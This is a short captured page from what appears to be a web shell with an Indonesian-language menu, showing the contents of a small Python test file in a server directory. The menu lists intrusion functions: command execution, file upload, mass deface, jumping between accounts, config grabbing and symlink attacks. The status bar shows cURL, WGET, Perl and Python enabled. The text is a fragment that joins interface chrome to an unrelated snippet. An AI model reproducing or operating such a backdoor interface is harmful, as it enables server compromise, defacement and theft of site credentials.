OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /boot/../python/../python/lib/python3.9/test/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
"""This is a test""" from __future__ import * def f(x): def g(y): return x + y return g print(f(2)(4))